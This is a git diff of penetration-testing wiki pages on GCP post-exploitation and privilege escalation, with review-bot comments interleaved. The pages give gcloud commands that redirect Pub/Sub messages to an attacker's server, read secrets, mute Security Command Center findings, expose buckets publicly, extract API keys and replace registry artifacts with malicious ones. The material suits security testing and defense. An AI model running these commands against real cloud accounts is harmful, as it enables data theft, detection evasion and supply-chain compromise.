- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Pub/Sub For more information about Pub/Sub check the following page: -{% content-ref url="../gcp-services/gcp-pub-sub.md" %} -[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-pub-sub.md +{{#endref}} ### `pubsub.topics.publish` @@ -61,12 +48,10 @@ Give yourself permission to perform any of the previous attacks. Get all the messages in a web server: -{% code overflow="wrap" %} ```bash # Crete push subscription and recieve all the messages instantly in your web server gcloud pubsub subscriptions create --topic --push-endpoint https:// ``` -{% endcode %} Create a subscription and use it to **pull messages**: @@ -91,11 +76,9 @@ gcloud pubsub subscriptions delete Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it. -{% code overflow="wrap" %} ```bash gcloud pubsub subscriptions update --push-endpoint ``` -{% endcode %} ### `pubsub.subscriptions.setIamPolicy` @@ -106,25 +89,23 @@ Give yourself the permissions needed to perform any of the previously commented Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\ If there aren't any schemas you might need to create one. -{% code title="schema.json" %} -```json +```json:schema.json { - "namespace": "com.example", - "type": "record", - "name": "Person", - "fields": [ - { - "name": "name", - "type": "string" - }, - { - "name": "age", - "type": "int" - } - ] + "namespace": "com.example", + "type": "record", + "name": "Person", + "fields": [ + { + "name": "name", + "type": "string" + }, + { + "name": "age", + "type": "int" + } + ] } ``` -{% endcode %} ```bash # Attach new schema 
@@ -156,17 +137,4 @@ gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \ --snapshot=YOUR_SNAPSHOT_NAME ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
new file mode 100644
index 000000000..e679b0261
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
@@ -0,0 +1,22 @@
+# GCP - Secretmanager Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Secretmanager
+
+For more information about Secret Manager check:
+
+{{#ref}}
+../gcp-services/gcp-secrets-manager-enum.md
+{{#endref}}
+
+### `secretmanager.versions.access`
+
+This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+
+```bash
+# Get clear-text of version 1 of secret: ""
+gcloud secrets versions access 1 --secret=""
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
new file mode 100644
index 000000000..837f694ed
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
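Review bot: The paragraph under `secretmanager.versions.access` has several typos ("This give you", "privielegs", "sotred") and the snippet only reads version `1`; `gcloud secrets versions access latest --secret=SECRET_NAME` reads the current version without knowing its number. I'd reword it as `This gives you access to read the secrets stored in Secret Manager, which may help to escalate privileges depending on what is stored inside the secret:`. On the detection side, a remark that reading a version is a data-access call, so it only shows up in Cloud Audit Logs when Data Access logging is enabled for Secret Manager (as far as I recall), would tell defenders where to look for this.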
@@ -0,0 +1,58 @@
+# GCP - Security Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Security
+
+For more information check:
+
+{{#ref}}
+../gcp-services/gcp-security-enum.md
+{{#endref}}
+
+### `securitycenter.muteconfigs.create`
+
+Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
+
+```bash
+# Create Muteconfig
+gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
+```
+
+### `securitycenter.muteconfigs.update`
+
+Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
+
+```bash
+# Update Muteconfig
+gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
+```
+
+### `securitycenter.findings.bulkMuteUpdate`
+
+Mute findings based on a filer:
+
+```bash
+# Mute based on a filter
+gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
+```
+
+A muted finding won't appear in the SCC dashboard and reports.
+
+### `securitycenter.findings.setMute`
+
+Mute findings based on source, findings...
+
+```bash
+gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
+```
+
+### `securitycenter.findings.update`
+
+Update a finding to indicate erroneous information:
+
+```bash
+gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
new file mode 100644
index 000000000..38ebcb8ed
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
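Review bot: The `securitycenter.findings.update` snippet wraps the finding id in backticks inside a bash fence, so `myFinding` would be run as a command substitution if pasted; it should be a plain placeholder, `gcloud scc findings update FINDING_ID --organization=ORG_ID --source=SOURCE_ID --state=INACTIVE`. Organization ids are inconsistent across the snippets (`123`, `929851756715`, `organizations/123`, `123456`), and `929851756715` looks like a real id copied from a test environment rather than a placeholder, so one `ORG_ID` throughout would be cleaner. "filer" under `findings.bulkMuteUpdate` should be "filter". Worth one line for defenders as well: mute-config creation/updates and mute operations are admin writes that I believe land in Cloud Audit Logs (Admin Activity), which is the signal to alert on for this technique.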
@@ -0,0 +1,34 @@
+# GCP - Storage Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Storage
+
+For more information about CLoud Storage check this page:
+
+{{#ref}}
+../gcp-services/gcp-storage-enum.md
+{{#endref}}
+
+### Give Public Access
+
+It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket:
+
+```bash
+# Disable public prevention
+gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
+
+# Make all objects in a bucket public
+gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer
+## I don't think you can make specific objects public just with IAM
+
+# Make a bucket or object public (via ACL)
+gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER
+gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
+```
+
+If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
+
+To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/`
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
new file mode 100644
index 000000000..d2f1698bd
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
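Review bot: `--no-public-access-prevention` only changes the bucket-level setting; when `constraints/storage.publicAccessPrevention` is enforced by org policy on the project or organization the bucket stays blocked regardless, and the text under "Give Public Access" should say so, e.g. `This only works if public access prevention is not enforced through org policy (constraints/storage.publicAccessPrevention); a bucket-level setting cannot override an enforced constraint.` That constraint is also the defender-side control worth naming here. Typo: "CLoud Storage". As rendered here the two browser URLs at the end read `https://.storage.googleapis.com/` with no bucket or object name, which looks like angle-bracket placeholders being dropped as HTML by the renderer (the `--secret=""` and `api-keys undelete` snippets in the sibling files show the same symptom); plain `BUCKET_NAME`/`OBJECT_NAME` placeholders like the ones in the gcloud commands above survive rendering.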
@@ -0,0 +1,21 @@
+# GCP - Workflows Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Workflow
+
+Basic information:
+
+{{#ref}}
+../gcp-services/gcp-workflows-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-workflows-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
similarity index 55%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
index 7e46a20ba..b79f6f274 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
@@ -1,19 +1,6 @@
 # GCP - Privilege Escalation
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Introduction to GCP Privilege Escalation 
@@ -23,25 +10,23 @@ There are certain permissions that will allow a user to **get even more permissi Therefore, I would like to separate GCP privilege escalation techniques in **2 groups**: -* **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account. -* **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function. - * Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen). +- **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account. +- **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function. + - Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen). 
Obviously, the most interesting privilege escalation techniques are the ones of the **second group** because it will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may give you also access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a token of a SA). -{% hint style="warning" %} -It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also. -{% endhint %} +> [!WARNING] +> It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also. -{% hint style="info" %} -The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API. -{% endhint %} +> [!NOTE] +> The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API. ## Permissions for Privilege Escalation Methodology This is how I **test for specific permissions** to perform specific actions inside GCP. -1. Download the github repo [https://github.com/carlospolop/gcp\_privesc\_scripts](https://github.com/carlospolop/gcp_privesc_scripts) +1. Download the github repo [https://github.com/carlospolop/gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts) 2. Add in tests/ the new script ## Bypassing access scopes 
@@ -67,9 +52,8 @@ done The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization. -{% hint style="warning" %} -GCP has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. -{% endhint %} +> [!WARNING] +> GCP has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. **The subpages of this section are ordered by services. You can find on each service different ways to escalate privileges on the services.** 
@@ -77,27 +61,14 @@ GCP has **hundreds** (if not thousands) of **permissions** that an entity can be If you are inside a machine in GCP you might be able to abuse permissions to escalate privileges even locally: -{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} +{{#ref}} +gcp-local-privilege-escalation-ssh-pivoting.md +{{#endref}} ## References -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md new file mode 100644 index 000000000..810589dcf --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md 
@@ -0,0 +1,78 @@ +# GCP - Apikeys Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Apikeys + +The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ + +Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. + +For more information about API Keys check: + +{{#ref}} +../gcp-services/gcp-api-keys-enum.md +{{#endref}} + +For other ways to create API keys check: + +{{#ref}} +gcp-serviceusage-privesc.md +{{#endref}} + +### Brute Force API Key access + +As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** + +### `apikeys.keys.create` + +This permission allows to **create an API key**: + +```bash +gcloud services api-keys create +Operation [operations/akmf.p7-[...]9] complete. Result: { + "@type":"type.googleapis.com/google.api.apikeys.v2.Key", + "createTime":"2022-01-26T12:23:06.281029Z", + "etag":"W/\"HOhA[...]==\"", + "keyString":"AIzaSy[...]oU", + "name":"projects/5[...]6/locations/global/keys/f707[...]e8", + "uid":"f707[...]e8", + "updateTime":"2022-01-26T12:23:06.378442Z" +} +``` + +You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh). + +> [!CAUTION] +> Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. 
So a user could c**reate a project and an API key inside this project**. + +### `apikeys.keys.getKeyString` , `apikeys.keys.list` + +These permissions allows **list and get all the apiKeys and get the Key**: + +```bash +for key in $(gcloud services api-keys list --uri); do + gcloud services api-keys get-key-string "$key" +done +``` + +You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). + +### `apikeys.keys.undelete` , `apikeys.keys.list` + +These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done: + +```bash +gcloud services api-keys list --show-deleted +gcloud services api-keys undelete +``` + +### Create Internal OAuth Application to phish other workers + +Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin): + +{{#ref}} +../../workspace-security/gws-google-platforms-phishing/ +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md similarity index 64% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md index b9ced0feb..38c219102 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md 
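Review bot: The CAUTION closing the `apikeys.keys.create` section presents project creation as an unconditional default, but it only holds while `roles/resourcemanager.projectCreator` is still granted to the whole domain at the organization level (Google's initial setting); I'd add `(this initial domain-wide grant of roles/resourcemanager.projectCreator can be removed at the organization level, which closes this path)`. Typos: "not this from the docs" → "note this from the docs", "adn" → "and". Under "Brute Force API Key access" a sentence saying that the API restrictions and application restrictions configured on the key are what decide which calls succeed would both explain the scanner's results and name the control. The `gcloud services api-keys undelete` line has lost its key-name argument as rendered here; a plain `KEY_NAME` placeholder avoids that.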
@@ -1,27 +1,14 @@ # GCP - AppEngine Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## App Engine For more information about App Engine check: -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-app-engine-enum.md +{{#endref}} ### `appengine.applications.get`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.operations.list`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.create`, `appengine.versions.get`, `appengine.versions.list`, `cloudbuild.builds.get`,`iam.serviceAccounts.actAs`, `resourcemanager.projects.get`, `storage.objects.create`, `storage.objects.list` @@ -39,9 +26,8 @@ gcloud app deploy #Upload and start application inside the folder Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes. -{% hint style="info" %} -It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used. -{% endhint %} +> [!NOTE] +> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used. The URL of the application is something like `https://.oa.r.appspot.com/` or `https://-dot-.oa.r.appspot.com` @@ -56,7 +42,7 @@ gsutil ls # Download code mkdir /tmp/appengine2 cd /tmp/appengine2 -## In this case it was found in this custom bucket but you could also use the +## In this case it was found in this custom bucket but you could also use the ## buckets generated when the App Engine is created gsutil cp gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip . unzip labs_appengine_1_premissions_privesc.zip 
@@ -98,11 +84,9 @@ gcloud app instances ssh --service --version I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account. -{% code overflow="wrap" %} ```bash gcloud app update --service-account= ``` -{% endcode %} ### `appengine.versions.getFileContents`, `appengine.versions.update` @@ -116,26 +100,13 @@ However, with read & write access over this bucket, it's possible to escalate pr For more information and a **PoC check the relevant information from this page**: -{% content-ref url="gcp-storage-privesc.md" %} -[gcp-storage-privesc.md](gcp-storage-privesc.md) -{% endcontent-ref %} +{{#ref}} +gcp-storage-privesc.md +{{#endref}} ### Write Access over the Artifact Registry Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md new file mode 100644 index 000000000..36c973132 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md @@ -0,0 +1,173 @@ +# GCP - Artifact Registry Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Artifact Registry + +For more information about Artifact Registry check: + +{{#ref}} +../gcp-services/gcp-artifact-registry-enum.md +{{#endref}} + +### artifactregistry.repositories.uploadArtifacts + +With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images: + +```bash +# Configure docker to use gcloud to authenticate with Artifact Registry +gcloud auth configure-docker -docker.pkg.dev + +# tag the image to upload it +docker tag : -docker.pkg.dev///: + +# Upload it +docker push -docker.pkg.dev///: +``` + +> [!CAUTION] +> It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded. + +
+ +Upload a Python library + +**Start by creating the library to upload** (if you can download the latest version from the registry you can avoid this step): + +1. **Set up your project structure**: + + - Create a new directory for your library, e.g., `hello_world_library`. + - Inside this directory, create another directory with your package name, e.g., `hello_world`. + - Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package. + + ```bash + mkdir hello_world_library + cd hello_world_library + mkdir hello_world + touch hello_world/__init__.py + ``` + +2. **Write your library code**: + + - Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`. + - Write your "Hello, World!" function: + + ```python + # hello_world/greet.py + def say_hello(): + return "Hello, World!" + ``` + +3. **Create a `setup.py` file**: + + - In the root of your `hello_world_library` directory, create a `setup.py` file. + - This file contains metadata about your library and tells Python how to install it. + + ```python + # setup.py + from setuptools import setup, find_packages + + setup( + name='hello_world', + version='0.1', + packages=find_packages(), + install_requires=[ + # Any dependencies your library needs + ], + ) + ``` + +**Now, lets upload the library:** + +1. **Build your package**: + + - From the root of your `hello_world_library` directory, run: + + ```sh + python3 setup.py sdist bdist_wheel + ``` + +2. **Configure authentication for twine** (used to upload your package): + - Ensure you have `twine` installed (`pip install twine`). + - Use `gcloud` to configure credentials: + +```` +```sh +twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://-python.pkg.dev/// dist/* +``` +```` + +3. **Clean the build** + +```bash +rm -rf dist build hello_world.egg-info +``` + +
+ +> [!CAUTION] +> It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:** +> +> ```sh +> gcloud artifacts versions delete --repository= --location= --package= +> ``` + +### `artifactregistry.repositories.downloadArtifacts` + +With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**. + +Download a **Docker** image: + +```sh +# Configure docker to use gcloud to authenticate with Artifact Registry +gcloud auth configure-docker -docker.pkg.dev + +# Dowload image +docker pull -docker.pkg.dev///: +``` + +Download a **python** library: + +```bash +pip install --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@-python.pkg.dev///simple/" --trusted-host -python.pkg.dev --no-cache-dir +``` + +- What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? Check this page: + +{{#ref}} +../gcp-persistence/gcp-artifact-registry-persistence.md +{{#endref}} + +### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`) + +Delete artifacts from the registry, like docker images: + +```bash +# Delete a docker image +gcloud artifacts docker images delete -docker.pkg.dev///: +``` + +### `artifactregistry.repositories.delete` + +Detele a full repository (even if it has content): + +``` +gcloud artifacts repositories delete --location= +``` + +### `artifactregistry.repositories.setIamPolicy` + +An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks. 
+ +### Pivoting to other Services through Artifact Registry Read & Write + +- **Cloud Functions** + +When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**. + +- **App Engine** + +Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ +It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md new file mode 100644 index 000000000..b8839f01d --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md 
